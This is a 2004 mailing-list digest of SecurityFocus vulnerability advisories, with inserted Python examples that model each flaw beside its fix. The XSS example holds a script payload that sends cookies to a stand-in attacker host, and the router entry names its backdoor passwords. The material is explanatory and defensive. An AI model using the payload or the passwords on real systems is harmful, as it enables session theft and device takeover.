[gull-annonces] Summary of SecurityFocus Newsletter #245

Marc SCHAEFER schaefer at alphanet.ch
Thu Apr 22 10:11:01 CEST 2004


[ the quality of the SecurityFocus source has dropped again ]

Open WebMail Arbitrary Directory Creation Vulnerability
BugTraq ID: 10087
Remote: Yes
Date Published: Apr 09 2004
Relevant URL: http://www.securityfocus.com/bid/10087
Summary:
It has been reported that Open WebMail may be prone to an arbitrary
directory creation vulnerability that may allow remote attackers to
create potentially malicious directories in the underlying file system
through the web interface.

Open WebMail versions 2.30 and prior are vulnerable to this issue;
however, the problem has been addressed in the product's CVS.

Open WebMail is a GPL webmail based on NeoMail
(http://www.neocodesolutions.com/software/neomail/)
http://openwebmail.org/


RSniff Remote Denial of Service Vulnerability
BugTraq ID: 10093
Remote: Yes
Date Published: Apr 09 2004
Relevant URL: http://www.securityfocus.com/bid/10093
Summary:
It has been reported that RSniff may be prone to a remote denial of
service issue when a client repeatedly connects to the RSniff daemon
and does not issue the 'AUTHENTICATE' command to log in or simply
closes the connection.  The server fails to accept new connections
after about 1024 malicious connection attempts have been made.

RSniff 1.0 has been reported to be prone to this issue.

RSniff is a Linux-based protocol analyzer designed for remote sniffing.
The server captures the packets, and the client GUI connects to control
it. The administrator can monitor any number of network nodes by running
the client and connecting to multiple servers. It is designed to capture
and analyze Ethernet, ARP, RARP, IP, ICMP, IGMP, TCP and UDP packets.
GPL licence
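Added example, not part of the original post and not RSniff's code: a toy Python daemon that reproduces the failure mode described above (a fixed table of client slots that is never given back when an unauthenticated peer hangs up or stays silent) next to the two fixes such a daemon needs. The slot limit, the 'AUTHENTICATE' line and the 'OK' reply are assumptions; run_scenario() returns whether a legitimate client still gets served after the table has been filled.

```python
"""
Model of RSniff's pre-authentication connection exhaustion (BID 10093) and the
two fixes such a daemon needs: free the slot when an unauthenticated peer hangs
up, and reap peers that never send AUTHENTICATE.  Added example on a toy daemon;
the slot limit, login line and 'OK' reply are assumptions, not RSniff's code.
"""
import selectors
import socket
import threading
import time

AUTH_LINE = b"AUTHENTICATE letmein\n"   # assumed client login line


class SniffDaemon(threading.Thread):
    """Single-threaded accept loop with a fixed table of client slots."""

    def __init__(self, max_clients, hardened, idle_timeout=0.3):
        super().__init__(daemon=True)
        self.max_clients = max_clients   # stands in for the ~1024 fd budget
        self.hardened = hardened
        self.idle_timeout = idle_timeout
        self.pending = {}                # sock -> accept time, not yet authenticated
        self.authed = set()
        self.sel = selectors.DefaultSelector()
        self.listener = socket.socket()
        self.listener.bind(("127.0.0.1", 0))
        self.listener.listen(64)
        self.listener.setblocking(False)
        self.sel.register(self.listener, selectors.EVENT_READ)
        self.port = self.listener.getsockname()[1]
        self.stopped = threading.Event()

    def _full(self):
        return len(self.pending) + len(self.authed) >= self.max_clients

    def _drop(self, sock):
        self.sel.unregister(sock)
        sock.close()
        self.pending.pop(sock, None)
        self.authed.discard(sock)

    def _on_readable(self, sock):
        try:
            data = sock.recv(256)
        except OSError:                  # reset by peer counts as hung up
            data = b""
        if data == b"":                  # peer hung up
            if self.hardened or sock in self.authed:
                self._drop(sock)         # fix 1: give the slot back
            else:                        # modelled bug: the slot is never freed,
                self.sel.unregister(sock)  # only the poll registration goes away
        elif sock in self.pending and data.startswith(b"AUTHENTICATE "):
            del self.pending[sock]
            self.authed.add(sock)
            sock.sendall(b"OK\n")

    def run(self):
        while not self.stopped.is_set():
            for key, _ in self.sel.select(timeout=0.05):
                if key.fileobj is not self.listener:
                    self._on_readable(key.fileobj)
                elif self._full():       # table full: newcomers sit in the backlog
                    time.sleep(0.05)
                else:
                    conn, _ = self.listener.accept()
                    conn.setblocking(False)
                    self.pending[conn] = time.monotonic()
                    self.sel.register(conn, selectors.EVENT_READ)
            if self.hardened:            # fix 2: reap silent pre-auth peers
                now = time.monotonic()
                for sock, t0 in list(self.pending.items()):
                    if now - t0 > self.idle_timeout:
                        self._drop(sock)
        for sock in list(self.pending) + list(self.authed) + [self.listener]:
            sock.close()


def run_scenario(hardened, hold_open, max_clients=8):
    """Fill the table with peers that never authenticate; True if a legitimate
    client is still served afterwards."""
    daemon = SniffDaemon(max_clients, hardened)
    daemon.start()
    attackers = []
    for _ in range(max_clients):
        s = socket.create_connection(("127.0.0.1", daemon.port))
        attackers.append(s) if hold_open else s.close()   # stay silent, or hang up
    time.sleep(0.6)                      # let the daemon accept and, if hardened, reap
    legit = socket.create_connection(("127.0.0.1", daemon.port))
    legit.settimeout(1.0)
    legit.sendall(AUTH_LINE)
    try:
        served = legit.recv(16) == b"OK\n"
    except socket.timeout:
        served = False                   # still stuck in the kernel backlog
    legit.close()
    for s in attackers:
        s.close()
    daemon.stopped.set()
    daemon.join()
    return served
```

With hardened=False both attacker styles (hanging up at once, or holding the socket open without a word) leave the legitimate client queued forever; with hardened=True it gets its 'OK' in both cases. A real daemon would also cap pre-authentication connections per source address, which this model leaves out.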

X-Micro WLAN 11b Broadband Router Backdoor Administration Ac...
BugTraq ID: 10095
Remote: Yes
Date Published: Apr 10 2004
Relevant URL: http://www.securityfocus.com/bid/10095
Summary:
It has been reported that the firmware shipped with the X-Micro 11b
Broadband Router has a built-in administrative account that cannot be
disabled.  The account, username and password "super", appears to be a
backdoor and may provide remote attackers possessing knowledge of the
account with complete control over the device.  According to the
author of the report, the built-in administration webserver listens on
both internal and external interfaces.  Attackers may authenticate
with the "super" account from outside of the LAN and gain control of
the device through this web interface.  Once authenticated, it is
possible for attackers to install new firmware on the device.

**It has been reported that version 1.6.0.1 of the WLAN 11b Broadband
Router also contains a built-in administrative account that cannot be
disabled.  The account, username and password "1502", appears to be
a backdoor and may provide remote attackers possessing knowledge of
the account with complete control over the device.

[ firmware ]

Linux Kernel Sigqueue Blocking Denial Of Service Vulnerabili...
BugTraq ID: 10096
Remote: No
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10096
Summary:
A vulnerability has been reported in the Linux Kernel that may permit
a malicious local user to affect a system-wide denial of service
condition.  This issue may be triggered via the Kernel signal queue
(struct sigqueue) and may be exploited to exhaust the system process
table by causing an excessive number of threads to be left in a zombie
state.

There is also an advisory that will probably come next week about
setsockopt(), concerning the kernel from 2.4.22 onward.

Eazel Nautilus Trash Folder Handler Buffer Overflow Vulnerab...
BugTraq ID: 10099
Remote: No
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10099
Summary:
Nautilus has been reported to be prone to a buffer overflow vulnerability.

The vulnerability is reported to present itself when Nautilus attempts
to delete a malicious directory and that directory is later operated
on in the "Trash" folder.

An attacker who has some degree of interactive access to an affected
system may attempt to exploit this vulnerability to execute code in
the context of the user who is invoking Nautilus file manager.

Blackboard Learning System Multiple Cross-Site Scripting Vul...
BugTraq ID: 10101
Remote: Yes
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10101
Summary:
Blackboard Learning System has been reported prone to multiple
cross-site scripting vulnerabilities. These issues are due to a
failure of the application to properly validate user supplied URI
input.

The first issue is reported to affect the "addressbook.pl" script.
The second issue is reported to affect the "tasks.pl" script. The
third issue is reported to affect three URI parameters, of the
"calendar.pl" script.

In all cases the user-supplied parameters are not sufficiently
sanitized prior to being rendered in the browser of the target user.

These issues could permit a remote attacker to create a malicious link
to the vulnerable application that includes hostile HTML and script
code. If this link were followed, the hostile code may be rendered in
the web browser of the victim user. This would occur in the security
context of the affected web site and may allow for theft of
cookie-based authentication credentials or other attacks.

(language not determined)

http://www.cla.sc.edu/infosys/bb/
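Added example, not part of the original post and not Blackboard code: the reflected XSS pattern the advisory describes, a URI parameter copied into the page as-is, shown as two small Python renderers standing in for the Perl scripts, beside a fixed version and the check a tester runs. The 'view' and 'q' parameter names and the attack link are assumptions, since the advisory does not list the affected parameters.

```python
"""
Reflected XSS of the kind reported against Blackboard's addressbook.pl,
tasks.pl and calendar.pl (BID 10101): a URI parameter copied into the page
without output encoding.  Added example, not Blackboard code; the 'view' and
'q' parameter names and the attack link are assumptions.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attack link: the payload closes the value attribute, then injects script.
PAYLOAD = '"><script>document.location="http://evil.example/?c="+document.cookie</script>'
MALICIOUS_LINK = "http://bb.example/bin/calendar.pl?view=month&q=" + quote(PAYLOAD)


def params_of(url):
    """Decode the query string the way a CGI script sees it (first value wins)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def render_vulnerable(url):
    """Interpolates raw parameters into HTML, the pattern behind the report."""
    p = params_of(url)
    return (f"<h1>Calendar: {p.get('view', 'month')}</h1>\n"
            f"<input name=\"q\" value=\"{p.get('q', '')}\">")


def render_fixed(url):
    """Same page: enumerated values are allow-listed, free text is HTML-encoded
    at the point of output (quotes included, since it lands in an attribute)."""
    p = params_of(url)
    view = p.get("view", "month")
    if view not in ("day", "week", "month"):
        view = "month"                          # reject rather than sanitise
    q = escape(p.get("q", ""), quote=True)      # & < > " ' become entities
    return (f"<h1>Calendar: {view}</h1>\n"
            f'<input name="q" value="{q}">')


def reflects_unescaped(page, payload=PAYLOAD):
    """The tester's check: does the payload come back verbatim, tags intact?"""
    return payload in page
```

The vulnerable renderer returns the payload verbatim, so the script runs in the site's origin as the advisory says; the fixed one returns it as `&quot;&gt;&lt;script&gt;...`, inert text inside the attribute, and drops an unexpected 'view' value altogether.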

Citadel/UX Insecure File Permissions Vulnerability
BugTraq ID: 10102
Remote: No
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10102
Summary:
Citadel/UX has been reported prone to a weak file permissions
vulnerability. The issue is reported to present itself because
Citadel/UX sets insecure permissions on the "data" directory and files
contained within, during installation.

As a direct result of this, any user who has interactive shell access
to a system may disclose potentially sensitive data that is contained
in the Citadel/UX database and data files.
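Added example, not part of the original post and not Citadel code: a small Python audit for this class of bug, which walks a data directory, reports every entry that group or other can reach, and applies the permissions an installer should have set. The sample install it checks is constructed in a scratch directory with the umask-default modes the advisory describes.

```python
"""
Audit for the Citadel/UX class of bug (BID 10102): a data directory and the
database files in it left readable by every local account after installation.
Added example, not Citadel code; the sample install below is constructed in a
scratch directory with the permissions the advisory describes.
"""
import os
import stat
import tempfile

EXPOSED_BITS = stat.S_IRWXG | stat.S_IRWXO   # any group/other permission bit


def exposed(path):
    """True if accounts other than the owner have any access to the entry."""
    return bool(os.lstat(path).st_mode & EXPOSED_BITS)   # lstat: do not follow links


def audit_tree(root):
    """Return paths (relative to root) that other local users can reach."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for full in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            if exposed(full):
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def lock_down(root):
    """What the installer should have done: 0700 on directories, 0600 on files."""
    for dirpath, _, filenames in os.walk(root):
        os.chmod(dirpath, 0o700)
        for f in filenames:
            os.chmod(os.path.join(dirpath, f), 0o600)


def build_sample_install():
    """Constructed data directory left at typical umask defaults (0755/0644)."""
    data = os.path.join(tempfile.mkdtemp(), "data")
    os.mkdir(data)
    os.chmod(data, 0o755)
    for name in ("citadel.db", "msgmain.db"):
        path = os.path.join(data, name)
        with open(path, "w") as f:
            f.write("constructed placeholder, not a real database\n")
        os.chmod(path, 0o644)
    return data
```

On the constructed tree audit_tree() lists the directory itself ('.') and both files; after lock_down() it lists nothing. The check uses lstat so a symlink planted in the tree is judged by its own mode, not by the target's.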

SurgeLDAP User.CGI Directory Traversal Vulnerability
BugTraq ID: 10103
Remote: Yes
Date Published: Apr 12 2004
Relevant URL: http://www.securityfocus.com/bid/10103
Summary:
SurgeLDAP is prone to a directory traversal vulnerability in one of
the scripts included with the built-in web administrative server,
potentially resulting in disclosure of files.

A remote attacker could exploit this issue to gain access to system
files outside of the web root directory of the built-in web server.
Files that are readable by the web server could be disclosed via this
issue.

KDE Konqueror Bitmap File Processing Denial of Service Vulne...
BugTraq ID: 10107
Remote: Yes
Date Published: Apr 13 2004
Relevant URL: http://www.securityfocus.com/bid/10107
Summary:
It has been reported that Konqueror may be prone to a denial of
service vulnerability when processing malformed bitmap files.  An
attacker can cause a denial of service condition in the system by
specifying a large value for a bitmap file to be loaded by the
browser.

This attack may lead to a denial of service condition in the system to
the exhaustion of memory resources.

This vulnerability has been tested on KDE 3.2.1 running on a
FreeBSD 5.2-CURRENT system; however, it is possible that other versions
running on different platforms are vulnerable as well.  It is likely
that this issue is present in a shared KDE bitmap processing
component, presenting attack vectors in other applications that use
the component.

This vulnerability is similar to the issue described in BID 10097
(Microsoft Internet Explorer Bitmap File Processing Denial of Service
Vulnerability).
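Added example, not part of the original post and not KDE code: a Python header check for the failure mode shared by the Konqueror and IE reports, where a decoder allocates width x height x depth straight from the header and a file of a few dozen bytes can claim a multi-exabyte image. Both bitmaps it checks are constructed in-line, and the 64 MiB budget is an assumption.

```python
"""
Header sanity check for the bitmap issue in Konqueror and Internet Explorer
(BIDs 10107 and 10097): a decoder that allocates width x height x depth straight
from the header can be driven to exhaust memory by a file a few dozen bytes long.
Added example, not KDE code; both bitmaps below are constructed in-line and the
64 MiB budget is an assumption.
"""
import struct

FILE_HDR = "<2sIHHI"         # 'BM', file size, reserved x2, offset of pixel data
INFO_HDR = "<IiiHHIIiiII"    # BITMAPINFOHEADER, 40 bytes, little-endian
HDR_LEN = struct.calcsize(FILE_HDR) + struct.calcsize(INFO_HDR)   # 54
MAX_PIXEL_BYTES = 64 * 1024 * 1024


def bmp_pixel_bytes(data, max_bytes=MAX_PIXEL_BYTES):
    """Parse both headers and return (width, rows, bytes) the decoder would need,
    or raise ValueError before anything is allocated."""
    if len(data) < HDR_LEN:
        raise ValueError("truncated header")
    magic, _, _, _, offset = struct.unpack_from(FILE_HDR, data, 0)
    (hdr_size, width, height, planes, bpp, compression,
     _, _, _, _, _) = struct.unpack_from(INFO_HDR, data, 14)
    if magic != b"BM" or hdr_size != 40 or planes != 1:
        raise ValueError("not a Windows bitmap")
    if bpp not in (1, 4, 8, 16, 24, 32) or compression != 0:
        raise ValueError("unsupported pixel format")
    if width <= 0 or height == 0:
        raise ValueError("bad dimensions")
    rows = abs(height)                         # negative height: top-down image
    stride = ((width * bpp + 31) // 32) * 4    # rows are padded to 4-byte multiples
    needed = stride * rows                     # exact in Python; a 32-bit size
    if needed > max_bytes:                     # computation in C would wrap first
        raise ValueError(f"{width}x{rows}@{bpp}bpp needs {needed} bytes")
    if offset < HDR_LEN or offset + needed > len(data):
        raise ValueError("header promises more pixel data than the file holds")
    return width, rows, needed


def is_safe_bmp(data):
    """Boolean wrapper for callers that just want to drop bad files."""
    try:
        bmp_pixel_bytes(data)
        return True
    except ValueError:
        return False


def make_bmp(width, height, bpp=24, pixels=b""):
    """Assemble a BMP from header fields; leave pixels empty to forge a header
    that promises a huge image inside a tiny file."""
    info = struct.pack(INFO_HDR, 40, width, height, 1, bpp, 0, len(pixels),
                       2835, 2835, 0, 0)
    head = struct.pack(FILE_HDR, b"BM", HDR_LEN + len(pixels), 0, 0, HDR_LEN)
    return head + info + pixels


GOOD = make_bmp(2, 2, pixels=bytes(16))      # 2x2 at 24 bpp: two 8-byte rows
HUGE = make_bmp(0x7FFFFFFF, 0x7FFFFFFF)      # multi-exabyte claim in 54 bytes
```

The budget check catches the large-value case from the advisory; the trailing length check catches the same header in a file that simply does not carry the pixels it promises. In a C decoder the width*height*depth product itself needs overflow-safe arithmetic before any of this, which the Python integers here do not have to worry about.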

CVS Client RCS diff File Corruption Vulnerability
BugTraq ID: 10138
Remote: Yes
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10138
Summary:
A vulnerability has been discovered in the CVS client. It is reported
that a problem in the revision control system (RCS) diff files may
allow an attacker to create an arbitrary file on a remote system. The
file will be created with the privileges of the user who is invoking
the CVS client.

CVS Server Piped Checkout Access Validation Vulnerability
BugTraq ID: 10140
Remote: Yes
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10140
Summary:
CVS server has been reported prone to an access validation
vulnerability. It is reported that the CVS server does not
sufficiently validate piped checkouts. The CVS server may honor a
request for a piped checkout for a path that resides outside of the
cvsroot.

Data that is harvested in this manner may be used to aid in further
attacks that are launched against the target server.
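Added example, not part of the original post and not code from any of the projects concerned: the one check behind three of the advisories above, Open WebMail creating directories from a web-supplied name (BID 10087), SurgeLDAP's user.cgi reading files outside its web root (BID 10103) and the CVS server honouring a piped checkout outside the cvsroot (BID 10140). It contrasts the naive join with a confinement that resolves the path and refuses anything that lands outside the root, including escapes through a planted symlink; the directory layout is constructed in a scratch directory.

```python
"""
Path confinement for the three path-handling bugs above: Open WebMail creating
directories from a web-supplied name (BID 10087), SurgeLDAP's user.cgi reading
files outside its web root (BID 10103) and the CVS server honouring a piped
checkout outside the cvsroot (BID 10140).  Added example, not code from any of
those projects; the directory layout it builds is constructed for the demo.
"""
import os
import tempfile


def naive_join(root, user_path):
    """The pattern behind such bugs: join and trust.  os.path.join throws root
    away when user_path is absolute, and '..' components are never checked."""
    return os.path.join(root, user_path)


def confine(root, user_path):
    """Resolve user_path beneath root and refuse anything that ends up outside,
    whether via '..', an absolute path, or a symlink planted inside root."""
    root_real = os.path.realpath(root)
    # A leading '/' means 'relative to root', never the host's own root.
    candidate = os.path.realpath(os.path.join(root_real, user_path.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PermissionError(f"{user_path!r} escapes {root!r}")
    return candidate


def is_plain_component(name):
    """For 'create folder' requests: one path element, nothing that can move."""
    return bool(name) and name not in (".", "..") and "/" not in name and "\0" not in name


def demo():
    """Build a web root with a secret next to it and a symlink planted inside,
    then record what each approach would hand to open()/mkdir().
    Returns (real web root, {request: (naive target, confined target or None)})."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "webroot")
    os.makedirs(os.path.join(root, "docs"))
    secret = os.path.join(base, "secret.txt")
    with open(secret, "w") as f:
        f.write("outside the web root\n")
    os.symlink(secret, os.path.join(root, "docs", "link"))   # planted by a local user
    results = {}
    for req in ("docs/index.html", "../secret.txt", "/etc/passwd",
                "docs/../../secret.txt", "docs/link"):
        try:
            safe = confine(root, req)
        except PermissionError:
            safe = None
        results[req] = (os.path.realpath(naive_join(root, req)), safe)
    return os.path.realpath(root), results
```

Of the five requests only the first survives confine() unchanged; '/etc/passwd' is mapped to a file under the root rather than to the host's file, and the symlink case shows why the check has to run on the resolved path, not on the string the client sent. For a mkdir from a folder name, is_plain_component() is the whole test: a single component can never leave its parent.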

Linux Kernel ISO9660 File System Buffer Overflow Vulnerabili...
BugTraq ID: 10141
Remote: No
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10141
Summary:
It has been reported that the Linux Kernel is prone to a local ISO9660
file system buffer overflow vulnerability.  This issue is due to a
failure of the application to properly validate buffer boundaries when
processing file system information.  An attacker must have adequate
permissions to mount the malicious file system to exploit the issue.
This is not enabled by default on a number of available Linux
distributions.

This issue may be exploited by an attacker to overflow and modify
kernel memory, potentially allowing the attacker to create an
arbitrary data structure in kernel memory.  This issue may be
leveraged to gain kernel level access to the affected system.

MySQL MYSQLD_Multi Insecure Temporary File Creation Vulnerab...
BugTraq ID: 10142
Remote: No
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10142
Summary:
mysqld_multi is reported prone to insecure temporary file
handling. The script likely creates temporary files with predictable
filenames.

An attacker may exploit this issue to launch symbolic link attacks
that will most likely result in corruption of files when the
vulnerable script is launched.

This issue would only affect Unix/Linux-based operating systems.
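Added example, not part of the original post and not MySQL's script: the symlink attack the advisory refers to, played out in Python in a scratch directory, with the predictable-name writer beside two fixes (mkstemp, or an O_CREAT|O_EXCL|O_NOFOLLOW open when the name cannot change). The file name, the victim file and the scratch directory are constructed for the demo, which plays both the attacker and the privileged script.

```python
"""
The symlink attack behind insecure temporary files such as mysqld_multi's
(BID 10142), beside two fixes: an unpredictable name opened with O_EXCL, or,
where the name must stay fixed, an open that refuses to reuse anything already
there.  Added example, not MySQL's script; the file name, the victim file and
the scratch directory are constructed for the demo, which plays both roles.
"""
import os
import tempfile

PREDICTABLE = "mysqld_multi.log"    # assumed fixed name of the kind such scripts use


def write_log_vulnerable(tmpdir, text):
    """Opens a well-known name for writing: if a symlink was planted there
    first, the truncation and the write land wherever it points."""
    path = os.path.join(tmpdir, PREDICTABLE)
    with open(path, "w") as f:      # O_CREAT|O_TRUNC without O_EXCL: follows links
        f.write(text)
    return path


def write_log_safe(tmpdir, text):
    """mkstemp picks a random name and opens it with O_CREAT|O_EXCL, mode 0600,
    so a pre-planted entry makes the open fail instead of being used."""
    fd, path = tempfile.mkstemp(prefix="mysqld_multi.", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(text)
    return path


def write_log_fixed_name(tmpdir, text):
    """If the name cannot change: create-or-fail, never reuse what is there."""
    path = os.path.join(tmpdir, PREDICTABLE)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except FileExistsError:
        return False                 # planted entry (even a dangling link): abort
    with os.fdopen(fd, "w") as f:
        f.write(text)
    return True


def simulate(writer):
    """Local attacker plants a symlink at the predictable name pointing at a
    victim file; then the privileged script runs.  Returns (victim content
    afterwards, writer's return value)."""
    base = tempfile.mkdtemp()
    tmpdir = os.path.join(base, "tmp")
    os.mkdir(tmpdir)
    victim = os.path.join(base, "victim.cnf")
    with open(victim, "w") as f:
        f.write("original config\n")
    os.symlink(victim, os.path.join(tmpdir, PREDICTABLE))   # the attacker's move
    outcome = writer(tmpdir, "log line written by the script\n")
    with open(victim) as f:
        return f.read(), outcome
```

With the vulnerable writer the victim file ends up containing the log line, which is the corruption the advisory describes; with either fix it is untouched, and the fixed-name variant reports that it refused to write at all, which is the right outcome for a script that cannot tell a planted link from its own leftover file.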

Linux Kernel JFS File System Information Leakage Vulnerabili...
BugTraq ID: 10143
Remote: No
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10143
Summary:
A vulnerability has been reported in the Linux Kernel that is related
to how JFS file systems are cleaned up.  In particular, a root user
may potentially gain access to private or sensitive information on
these file systems.

This really only poses a security risk if the root user is not
intended to access this information already.

Red Hat Linux GNU Mailman Remote Denial Of Service Vulnerabi...
BugTraq ID: 10147
Remote: Yes
Date Published: Apr 14 2004
Relevant URL: http://www.securityfocus.com/bid/10147
Summary:
An update that was released by Red Hat (RHSA-2004:019) to address the
issue described in BID 9620 (GNU Mailman Malformed Message Remote
Denial Of Service Vulnerability), is reported to introduce a denial of
service vulnerability.

A remote attacker may exploit this vulnerability to cause Mailman to
crash, effectively denying service to legitimate users.

ssmtp Mail Transfer Agent Multiple Format String Vulnerabili...
BugTraq ID: 10150
Remote: Yes
Date Published: Apr 15 2004
Relevant URL: http://www.securityfocus.com/bid/10150
Summary:
It has been reported that ssmtp may be prone to multiple format string
vulnerabilities that could allow a remote attacker to execute
arbitrary code in the context of the vulnerable process.  A successful
attack may allow an attacker to gain root privileges.

Linux Kernel XFS File System Information Leakage Vulnerabili...
BugTraq ID: 10151
Remote: No
Date Published: Apr 15 2004
Relevant URL: http://www.securityfocus.com/bid/10151
Summary:
An information leakage vulnerability has been reported to exist in the
Linux kernel when writing to an XFS file system.  This issue is due to
a design error that causes some kernel information to be leaked.

It has been reported that this issue requires that the attacker be
able to read the raw device, an action which is restricted to
privileged users.  Due to the nature of the issue, this really only
poses a security risk if the privileged user is not intended to access
this information already.

Linux Kernel EXT3 File System Information Leakage Vulnerabil...
BugTraq ID: 10152
Remote: No
Date Published: Apr 15 2004
Relevant URL: http://www.securityfocus.com/bid/10152
Summary:
An information leakage vulnerability has been reported to exist in the
Linux kernel when writing to an ext3 file system.  This issue is due
to a design error that causes some kernel information to be leaked.

It has been reported that this issue requires that the attacker be
able to read the raw device, an action which is restricted to
privileged users.  Due to the nature of the issue, this really only
poses a security risk if the privileged user is not intended to access
this information already.
